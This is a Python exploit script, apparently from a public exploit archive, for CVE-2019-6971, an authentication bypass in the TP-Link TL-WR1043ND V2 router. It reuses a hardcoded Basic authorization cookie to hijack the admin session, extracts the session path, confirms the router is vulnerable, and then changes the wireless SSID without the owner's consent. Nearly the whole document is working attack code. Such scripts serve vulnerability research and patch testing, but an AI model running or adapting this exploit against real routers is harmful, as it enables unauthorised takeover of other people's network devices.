# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
# Date: 2019-06-20
# Exploit Author: Uriel Kosayev
# Vendor Homepage: https://www.tp-link.com
# Version: TL-WR1043ND V2
# Tested on: TL-WR1043ND V2
# CVE : CVE-2019-6971
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971
import requests
ascii = '''
__________ __ _ __
/_ __/ __ \ / / (_)___ / /__
/ / / /_/ /_____/ / / / __ \/ //_/
/ / / ____/_____/ /___/ / / / / ,<
/_/ /_/ /_____/_/_/ /_/_/|_|
'''
print(ascii)
Default_Gateway = raw_input("Enter your TP-Link router IP: ")
# Constants
url = 'http://'
url2 = '/userRpm/LoginRpm.htm?Save=Save'
full = url + Default_Gateway + url2
# full = str(full)
# The full GET request with the cookie authorization hijacked
req_header = {
'Host': '{}'.format(Default_Gateway),
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
'Connection': 'close',
'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
'Upgrade-Insecure-Requests': '1'
}
try:
response = requests.get(full, headers=req_header).content
except requests.exceptions.ConnectionError:
print("Enter a valid Default Gateway IP address\nExiting...")
exit()
generate = response.split('/')[3] # Gets the randomized URL "session ID"
option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")
if option_1 is 1:
if generate in response:
print('Vulnerable!\n')
option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
if option_2 is 2:
newssid = raw_input('New name: ')
ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4®ion=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
newssid)
changessid_full = url + Default_Gateway + '/' + generate + ssid_url
requests.get(changessid_full, headers=req_header)
print('Changed to: {}'.format(newssid))
else:
("Please choose the correct option.\nExiting...")
exit()
else:
print('Not Vulnerable')
exit()
else:
print("Please choose the correct option.\nExiting...")
exit()